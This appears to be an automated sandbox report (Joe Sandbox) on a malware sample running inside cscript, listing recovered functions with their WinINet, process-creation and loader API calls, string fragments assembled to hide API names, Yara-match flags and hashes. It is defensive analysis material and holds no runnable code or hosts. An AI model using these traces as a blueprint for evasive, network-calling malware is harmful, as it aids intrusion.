Function 04692DC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04692DCA

Memory Dump Source

Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true

Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4620000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4c321aeee7eed84851713fa26408c2b065cdf5ce173d0036f5585918184f8709
Instruction ID: 84a4d9e1534a93953bd29cbf6ada6a8b36076db80f9bdff3f528d3d6f5646d43
Opcode Fuzzy Hash: 4c321aeee7eed84851713fa26408c2b065cdf5ce173d0036f5585918184f8709
Instruction Fuzzy Hash: C090027160150402F64475584504746000587D0345F51C415A5065654EDA69DDE57A66

Uniqueness

Uniqueness Score: -1.00%

Function 04692E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04692E5A

Memory Dump Source

Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true

Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4620000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0993a0ccad8107bf1daf4357556edf16e3567a40680a2c976588d468cf0cf288
Instruction ID: bc007c7397b528102f965c0b4ede0f49c819d3e0a0e0cc2fe67d644d382b6faf
Opcode Fuzzy Hash: 0993a0ccad8107bf1daf4357556edf16e3567a40680a2c976588d468cf0cf288
Instruction Fuzzy Hash: 1690026174150442F60475584514B060005C7E1345F51C419E1065654DDA29DC627527

Uniqueness

Uniqueness Score: -1.00%

Function 04692F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04692F0A

Memory Dump Source

Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true

Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4620000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 130071800729c8a9beed539aa933de7d46025dc52dff2df64ed89e3ff9b72377
Instruction ID: 266c85783e00653bae2bf31fa303cc170796558f5479a84f340ea36accb54bc0
Opcode Fuzzy Hash: 130071800729c8a9beed539aa933de7d46025dc52dff2df64ed89e3ff9b72377
Instruction Fuzzy Hash: 7D900221611D0042F70479684D14B07000587D0347F51C519A0155654CDD25DC716922

Uniqueness

Uniqueness Score: -1.00%

Function 046929F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 046929FA

Memory Dump Source

Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true

Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4620000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8af6b021e12bc8259c35c47cbb16fe7b25a1a3412078dd9a691cad9802564a3f
Instruction ID: 0eec469b9962ec793762d9b8fd2ec1bf84257bb524759b63c9d67cd6c9005e38
Opcode Fuzzy Hash: 8af6b021e12bc8259c35c47cbb16fe7b25a1a3412078dd9a691cad9802564a3f
Instruction Fuzzy Hash: B7900225611500032609B9580704507004687D5395351C425F1016650CEA31DC716522

Uniqueness

Uniqueness Score: -1.00%

Function 04692A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04692A8A

Memory Dump Source

Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true

Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4620000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 45d199223aa7c3badb44ce92dd115cce7ae0dd097c9b3850f7b2a3a4f2e12b40
Instruction ID: bc34291233acbafb49253ccffe74726230c945a2c602d4c7f7ddc9ff11875946
Opcode Fuzzy Hash: 45d199223aa7c3badb44ce92dd115cce7ae0dd097c9b3850f7b2a3a4f2e12b40
Instruction Fuzzy Hash: 4E90026160250003660975584514616400A87E0245B51C425E1015690DD935DCA17526

Uniqueness

Uniqueness Score: -1.00%

Function 04692B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04692B0A

Memory Dump Source

Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true

Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4620000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4ce20c1265921f089e2cbc5f9404af04519b10dadb43ad3839af633246ac7fa3
Instruction ID: d02db885918d973b14d6a98fab3f574f57efc7a788c9ea78b28873a37e43cb78
Opcode Fuzzy Hash: 4ce20c1265921f089e2cbc5f9404af04519b10dadb43ad3839af633246ac7fa3
Instruction Fuzzy Hash: E190023160554842F64475584504A46001587D0349F51C415A0065794DEA35DD65BA62

Uniqueness

Uniqueness Score: -1.00%

Function 04692B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04692B1A

Memory Dump Source

Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true

Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4620000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 680a609a6c99ef95569cc85684ebd47136b1531369bbcf3e268f666610291c28
Instruction ID: 20eafa08670d30d762ef0c087a5f685dd2e8ccb34c85398efb1cfac084009622
Opcode Fuzzy Hash: 680a609a6c99ef95569cc85684ebd47136b1531369bbcf3e268f666610291c28
Instruction Fuzzy Hash: 0190023160150802F6847558450464A000587D1345F91C419A0026754DDE25DE697BA2

Uniqueness

Uniqueness Score: -1.00%

Function 04692BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04692BCA

Memory Dump Source

Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true

Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4620000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c1cd8e9f0b1c3b4aecb1f698192e54e2e773a77d89c5f864f86666aef1ff135f
Instruction ID: 5dca4199b3e32e4d67915b259122bb73f02da777a356bf26c7af68dd111cf607
Opcode Fuzzy Hash: c1cd8e9f0b1c3b4aecb1f698192e54e2e773a77d89c5f864f86666aef1ff135f
Instruction Fuzzy Hash: C990023160150402F60479985508646000587E0345F51D415A5025655EDA75DCA17532

Uniqueness

Uniqueness Score: -1.00%

Function 04692B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04692B8A

Memory Dump Source

Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true

Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4620000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e824024fe5ffe73813547370e985ba6f0782a02519ad48bb479d840ab3e351f5
Instruction ID: d77e2745ed0d81f7d4cb5c7a87bc278a09d066e0aaabb73791f595addd7b6d01
Opcode Fuzzy Hash: e824024fe5ffe73813547370e985ba6f0782a02519ad48bb479d840ab3e351f5
Instruction Fuzzy Hash: 3F90023160150842F60475584504B46000587E0345F51C41AA0125754DDA25DC617922

Uniqueness

Uniqueness Score: -1.00%

Function 04692B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04692B9A

Memory Dump Source

Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true

Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4620000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 189985e4b71861d580e60291d34187c818684b973262be6c394fe6ca90d20ace
Instruction ID: 073579cb83797451ad1e6e2139c9a8589ebe8ce9b9dda6e08f0027d598e2d1d8
Opcode Fuzzy Hash: 189985e4b71861d580e60291d34187c818684b973262be6c394fe6ca90d20ace
Instruction Fuzzy Hash: 1590023160158802F6147558850474A000587D0345F55C815A4425758DDAA5DCA17522

Uniqueness

Uniqueness Score: -1.00%

Function 046934E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 046934EA

Memory Dump Source

Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true

Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4620000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3477a8ca192c2e69493645d8290dbbeb5c25f56dcbbb8609efc4e1ac5265af47
Instruction ID: 61075b1fa4c60787ef881977d81480e1ffa17adb8f60d3a94ba95f8ad7191408
Opcode Fuzzy Hash: 3477a8ca192c2e69493645d8290dbbeb5c25f56dcbbb8609efc4e1ac5265af47
Instruction Fuzzy Hash: A4900231A0560402F60475584614706100587D0245F61C815A0425668DDBA5DD6179A3

Uniqueness

Uniqueness Score: -1.00%

Function 021AAA70 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 021AAAD8

Strings

Http, xrefs: 021AAA8A
OpenRequestA, xrefs: 021AAACE, 021AAAD6
HttpOpenRequestA, xrefs: 021AAACA, 021AAAD5
RequestA, xrefs: 021AAAD2, 021AAAD7
HttpOpenRequestA, xrefs: 021AAA7D
estA, xrefs: 021AAA9F
Open, xrefs: 021AAA91
Requ, xrefs: 021AAA98

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
API String ID: 1984915467-4016285707
Opcode ID: 4cfb9678fb708ccf4b305b7de459e0cb374a3b63d560b69bc85e9c03fd5ad30e
Instruction ID: c7232d9815b125ef7134f2165e6026c08ca879c37297efbf610cd866696708ec
Opcode Fuzzy Hash: 4cfb9678fb708ccf4b305b7de459e0cb374a3b63d560b69bc85e9c03fd5ad30e
Instruction Fuzzy Hash: E601E9B2905259AFCB04DF98D941EEF7BB9EB48214F158288FD49A7204D630EE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 021AAAF0 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 021AAB4C

Strings

HttpSendRequestA, xrefs: 021AAB3E, 021AAB49
HttpSendRequestA, xrefs: 021AAAFD
Requ, xrefs: 021AAB18
RequestA, xrefs: 021AAB46, 021AAB4B
estA, xrefs: 021AAB1F
Http, xrefs: 021AAB0A
Send, xrefs: 021AAB11
SendRequestA, xrefs: 021AAB42, 021AAB4A

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID: HttpRequestSend
String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
API String ID: 360639707-2503632690
Opcode ID: 59ee1c1fde48dd7e1995adb0c33b817c3f2d336c7a31c9a7f5aeb4c8a727f0e6
Instruction ID: 2f1255bd3ec438ac59ef2dd38a9cc918f1449cdc79b832ba8173914a73ec3cdf
Opcode Fuzzy Hash: 59ee1c1fde48dd7e1995adb0c33b817c3f2d336c7a31c9a7f5aeb4c8a727f0e6
Instruction Fuzzy Hash: FC014BB2909119AFCB14DF98D841AAFBBB8EB58210F148189FD18A7304D770EE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 021AA9F0 Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 021AAA58

Strings

ConnectA, xrefs: 021AAA52, 021AAA57
InternetConnectA, xrefs: 021AAA4A, 021AAA55
rnetConnectA, xrefs: 021AAA4E, 021AAA56
Inte, xrefs: 021AAA0A
rnet, xrefs: 021AAA11
ectA, xrefs: 021AAA1F
Conn, xrefs: 021AAA18

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID: ConnectInternet
String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
API String ID: 3050416762-1024195942
Opcode ID: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
Instruction ID: 52502a3439f9c432667b39765427978f03222e570e2e667309c28f9768bd8d60
Opcode Fuzzy Hash: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
Instruction Fuzzy Hash: 8B0129B2905118AFCB04DF98D941EEF77B9EB48310F054288BE08A7200D630EE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 021AA980 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 021AA9D7

Strings

InternetOpenA, xrefs: 021AA9CD, 021AA9D5
rnet, xrefs: 021AA9A1
A, xrefs: 021AA9AF
Inte, xrefs: 021AA99A
rnetOpenA, xrefs: 021AA9D1, 021AA9D6
Open, xrefs: 021AA9A8

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
Instruction ID: 9807cacfb5289b2c53892ad1a6bc8c7b0f42254088cf46d4075ab3702ac254e6
Opcode Fuzzy Hash: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
Instruction Fuzzy Hash: 20F019B6901218AF8B14DF98DD419FBB7B8FF48310B048589BE5897201D735AA50CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 021AA979 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 38
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 021AA9D7

Strings

InternetOpenA, xrefs: 021AA9CD, 021AA9D5
rnet, xrefs: 021AA9A1
A, xrefs: 021AA9AF
Inte, xrefs: 021AA99A
rnetOpenA, xrefs: 021AA9D1, 021AA9D6
Open, xrefs: 021AA9A8

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: 9ef4b628281c834a97b41797ed20c9e3de48b80d6172e481f1b57f1b4e9be5ff
Instruction ID: d65a17b205b7986534480a627fa5aceed60281c9a7ac155bc1a6e377b4c4ecd3
Opcode Fuzzy Hash: 9ef4b628281c834a97b41797ed20c9e3de48b80d6172e481f1b57f1b4e9be5ff
Instruction Fuzzy Hash: A9F08CB1901219AFCB14DF88DC419EF7BB9FF44310B04868DAA1867201C3356A10CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 021AAA66 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 021AAA58

Strings

ConnectA, xrefs: 021AAA52, 021AAA57
InternetConnectA, xrefs: 021AAA4A, 021AAA55
rnetConnectA, xrefs: 021AAA4E, 021AAA56

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID: ConnectInternet
String ID: ConnectA$InternetConnectA$rnetConnectA
API String ID: 3050416762-2730666810
Opcode ID: 6c4d9b5c0e818e06fcad38daf3a6a20b919fdfce3f85e4915b235cd264e2e341
Instruction ID: 4d97024e12f5fc1a2d8c7b93095e44876953f468668861224759926d3eb12330
Opcode Fuzzy Hash: 6c4d9b5c0e818e06fcad38daf3a6a20b919fdfce3f85e4915b235cd264e2e341
Instruction Fuzzy Hash: 07E0E5B662110DAB8B14CE98EC90DEB73EDEF8C614B044208BE0DD7200C630EC11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 021A9080 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 021A9128

Strings

wininet.dll, xrefs: 021A90DE, 021A90E7
net.dll, xrefs: 021A90F1, 021A9177, 021A914F, 021A915B, 021A9183

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 3f90cbdbfa848113bdf14e9c4ef4c32a33f53125a7f9dfad81e1e2f8edbaee94
Instruction ID: abaf3e87124e1ee7df06f0ae4a98730dac4adc640de52c4346b0d2f4238a91a7
Opcode Fuzzy Hash: 3f90cbdbfa848113bdf14e9c4ef4c32a33f53125a7f9dfad81e1e2f8edbaee94
Instruction Fuzzy Hash: 413190B6940344BFC724DF64C899FA7B7B9EB48B00F10811DF62A9B245D734B650CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 021A9079 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 021A9128

Strings

wininet.dll, xrefs: 021A90DE, 021A90E7
net.dll, xrefs: 021A90F1, 021A914F, 021A915B

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 0fb0c71abc52a88ea8cfbaf3c78401d3afc70d146283a4b66439d8a3ff85d379
Instruction ID: 0eb4d420b16f193c6f855e02ef23b54d3073f29dea8ff959d7f49681c70d0cb3
Opcode Fuzzy Hash: 0fb0c71abc52a88ea8cfbaf3c78401d3afc70d146283a4b66439d8a3ff85d379
Instruction Fuzzy Hash: 2A21A2B6940344BFC714DF64CC95B67B7B9FB48B04F10801DE62D5B245D774A550CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 021AA662 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02193AF8), ref: 021AA69D

Strings

.z`, xrefs: 021AA68C, 021AA698

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: fb461ea170c5daf3bbe360725efa13ce95292284c4caf2a4258c1d2eac53cd1d
Instruction ID: 3c1fdfd4338060f2c87bc791fd67b9b88aca5e93434fb6a8490167d4d53cb96e
Opcode Fuzzy Hash: fb461ea170c5daf3bbe360725efa13ce95292284c4caf2a4258c1d2eac53cd1d
Instruction Fuzzy Hash: 08E06DB52406096FDB18DFA4CC44EAB7768EF88310F254544FD195B252D231E805CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 021AA670 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02193AF8), ref: 021AA69D

Strings

.z`, xrefs: 021AA68C, 021AA698

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 78d8affe7833cb46455514845429d8454b0904359f9c828be22fbe18fbb7f425
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 25E04FB52002086FD718DF59CC44EA777ADEF88750F118554FD0857241C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 02198308 Relevance: 3.1, APIs: 2, Instructions: 57threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0219836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0219838B

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2cacc0f4ccea31a1052237ee0ca1d9da7ada8226772c7f56bb74ee4e87413e16
Instruction ID: 42ac83b69df527b816fe16a1574e058d8f5596978ac7e409f1ed6b9ee3e5be56
Opcode Fuzzy Hash: 2cacc0f4ccea31a1052237ee0ca1d9da7ada8226772c7f56bb74ee4e87413e16
Instruction Fuzzy Hash: 9D018431AC02297BEB20AAA49C42FBE7B6D5F41F54F150119FF04BA1C1E794AA0546E6

Uniqueness

Uniqueness Score: -1.00%

Function 02198310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0219836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0219838B

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
Instruction ID: 502df0c219c49aca448a775a802fee93eb4cc2ad58a3548707043cc9684326ed
Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
Instruction Fuzzy Hash: 0B01A231AC02287BEB20A6949C42FBF776D5F41F50F150119FF04BA1C1E7E4AA064AF6

Uniqueness

Uniqueness Score: -1.00%

Function 0219ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0219AD62

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: 3760fea96994f3814dec40f04a72b994ab1cf32ca75656f81dfffabf0b12728d
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: 09011EB9D8020DBBDF10EAA4DD51FDDB7B99F54308F004595A90997240FB31EB18CB91

Uniqueness

Uniqueness Score: -1.00%

Function 021AA6DD Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 021AA734

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: a7236efc08fb06a34230a110b35b3b9140f066148a669c418d0056759f92f0e4
Instruction ID: 8bb4891c48cc06b11d19a4f3fc43ce4f15a15d2c04e4226b948121b952bb02f0
Opcode Fuzzy Hash: a7236efc08fb06a34230a110b35b3b9140f066148a669c418d0056759f92f0e4
Instruction Fuzzy Hash: CA01A4B2214108AFCB58CF99DC80EEB37AEAF8C754F158258FA1DD7250C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 021AA6E0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

